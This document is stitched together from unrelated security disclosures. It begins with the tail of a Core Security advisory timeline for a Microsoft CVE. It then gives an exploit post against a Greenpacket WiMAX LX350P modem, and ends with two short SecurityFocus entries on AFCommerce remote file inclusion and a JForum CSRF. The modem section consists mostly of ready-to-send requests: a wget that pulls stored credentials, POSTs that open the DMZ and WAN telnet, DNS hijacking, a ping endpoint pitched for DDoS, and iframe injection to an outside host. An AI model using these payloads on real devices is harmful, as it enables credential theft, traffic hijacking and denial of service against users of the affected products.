2015-09-24: Core Security sent the first notification to Microsoft.
2015-09-24: Microsoft acknowledged receipt of the email and requested a draft version of the advisory.
2015-09-25: Core Security sent Microsoft the draft version of the advisory including a PoC.
2015-09-25: Microsoft cased the report under MSRC 31305.
2015-10-02: Core Security requested Microsoft provide a status update and confirmation of the reported bug.
2015-10-02: Microsoft informed Core Security that they were able to reproduce the issue. They were still reviewing it to determine if they would address it in a security release.
2015-10-07: Core Security requested Microsoft let us know once they made a decision.
2015-10-08: Microsoft informed Core Security they would keep us updated.
2015-10-26: Core Security asked Microsoft if there were any updates regarding the reported bug and if they had an estimated time of availability.
2015-10-27: Microsoft informed Core Security that they would be pursuing a fix for the reported issue and are working on a release date for it.
2015-11-05: Core Security asked Microsoft if they had determined a release date for the fix and a CVE ID to the reported vulnerability.
2015-11-10: Microsoft informed Core Security that they were targeting the security fix for this issue in their December release. They also informed us that they assigned CVE-2015-6127 to this case.
2015-11-11: Core Security thanked Microsoft for their reply and clarified that we would be publishing the advisory on Tuesday, the 8 of December, 2015.
2015-11-12: Microsoft requested from Core Security the link where the advisory would be published and the name of the researcher that should appear in the acknowledgment.
2015-11-13: Core Security informed Microsoft of the link and name that should appear in the acknowledgment.
2015-11-16: Microsoft informed Core Security that they updated the CVE acknowledgment accordingly.
2015-12-08: Advisory CORE-2015-0014 published.
9. References
[1] http://www.microsoft.com/.
[2] https://technet.microsoft.com/library/security/MS15-134.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
11. About Core Security
Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
### Exploit Title: WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities
### Date: ˝Friday, ˝December ˝11, ˝2015
### Exploit/Vulnerability Author: Alireza Azimzadeh Milani (alimp5)
### Vendor Homepage: http://www.greenpacket.com
### Version: v2.10.14-g1.5.2
### Tested on: Kali-Linux
I'm an ethical penetration tester and super moderator of Iran Security Team(http://irsecteam.org)
I have updated the modem to latest firmware which released by the company.
but with this work(upgrading the firmware); The attacker can bypass the authentication mechanism.
### Details of LX350P model:
Device Information:
Hardware model: WIXFMR-108
Firmware version: v2.10.14-g1.5.2-mobinnet
Firmware version: v2.10.14-g1.5.2
Firmware creation date: Mon Aug 15 16:45:58 2013
Frequency range: 3300000KHz~3600000KHz
Serial number: DXHKC120702523
I used below tools to find the vulnerabilities:
1)BurpSuite - Free Edition 2)wget 3)Nmap
### POCs of the modem:
#Get wimax credentials>>
wget -c "http://server/ajax.cgi?action=tag_init_wimax_auth.php"
#Enable and Change DMZ_Host IP in Firewall(request manipulating with BurpSuie)>>
POST /ajax.cgi?action=net_firewall HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Language=en; page=net_firewall.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
NETFILTER_FW_IPFILTER=&MGMT_WEB_WAN=on&MGMT_TELNET_WAN=on&NETFILTER_DMZ_HOST=8.8.8.8&btnSubmit=1
#Ping a system: (We can use from below query for launching (D)DOS attacks>>
http://server/ajax.cgi?action=tag_ipPing&pip=4.2.2.4&cache=false
http://server/ajax.cgi?action=tag_ipPing&pip=192.168.1.1&cache=false
http:/server/ajax.cgi?action=tag_ipPing&pip=192.168.1.1&cache=false
#Get info about WAN MAC, LAN MAC, DHCP + ... >>
http://server/ajax.cgi?action=tag_init_net_dhcp.php&cache=false
#Change the DNS IP Addresses (DNS Hijacking, Spoofing)>>
POST /ajax.cgi?action=net_dhcp HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Language=en; page=net_dhcp.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 945
DHCPD_STATIC_LEASE=&DHCPD_ENABLE=1&DHCPD_START_IP_01=192&DHCPD_START_IP_02=168&DHCPD_START_IP_03=1&DHCPD_START_IP_04=2&DHCPD_START_IP=192.168.1.2&DHCPD_END_IP_01=192&DHCPD_END_IP_02=168&DHCPD_END_IP_03=1&DHCPD_END_IP_04=200&DHCPD_END_IP=192.168.1.200&dns_type_1=2&DNS_IP_1_01=6&DNS_IP_1_02=6&DNS_IP_1_03=6&DNS_IP_1_04=6&DNS_IP_1=6.6.6.6&dns_type_2=2&DNS_IP_2_01=8&DNS_IP_2_02=8&DNS_IP_2_03=8&DNS_IP_2_04=8&DNS_IP_2=8.8.8.8&dns_type_3=1&DNS_IP_3_01=0&DNS_IP_3_02=0&DNS_IP_3_03=0&DNS_IP_3_04=0&DNS_IP_3=&DHCPD_LEASE_TIME=1440&btnSubmit=1&DHCPD_DNS=2%2C6.6.6.6+2%2C8.8.8.8+1%2C0.0.0.0&ippt_enable=0&Active_0=Y&Interface_0=1&Protocol_0=1&SrcPort_0=68&DestPort_0=67&Comment_0=DHCP+request+from+lan&Active_1=Y&Interface_1=2&Protocol_1=1&SrcPort_1=67&DestPort_1=68&Comment_1=DHCP+response+from+wan&IPPT_EXCEPTION=1%2CY%2C1%2C1%2C68%2C67%2CDHCP+request+from+lan%3B2%2CY%2C2%2C1%2C67%2C68%2CDHCP+response+from+wan%3B&IPPT_EXCEPTION_NUM=2
#Frame Injection>>
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&sid=DtTrEZnLke5Z&cache=false&time=1449547319726
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&sid=DtTrEZnLke5Z&cache=false
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>cache=false
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&time=3
### Conclusion:
1)the attacker can read sensitive information and set it on his own modem. such: for using free internet.
2)Anyone who can send a packet to the modem for crashing/downgrading/DOS.
3)An attacker might use "Frame Injection" to redirect users to other malicious websites that are used for phishing and similar attacks.
4)To obtain the control of similar modem(LX350P) in order to launching DOS or DDOS attacks on targets in WWW(world wide web).
At the end, I am thankful and I wait for your response.
source: https://www.securityfocus.com/bid/64541/info
AFCommerce is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/afcontrol/adblock.php?rootpathtocart=[RFI]
source: https://www.securityfocus.com/bid/64540/info
JForum is prone to a cross-site request-forgery vulnerability because the application does not properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
http://www.example.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2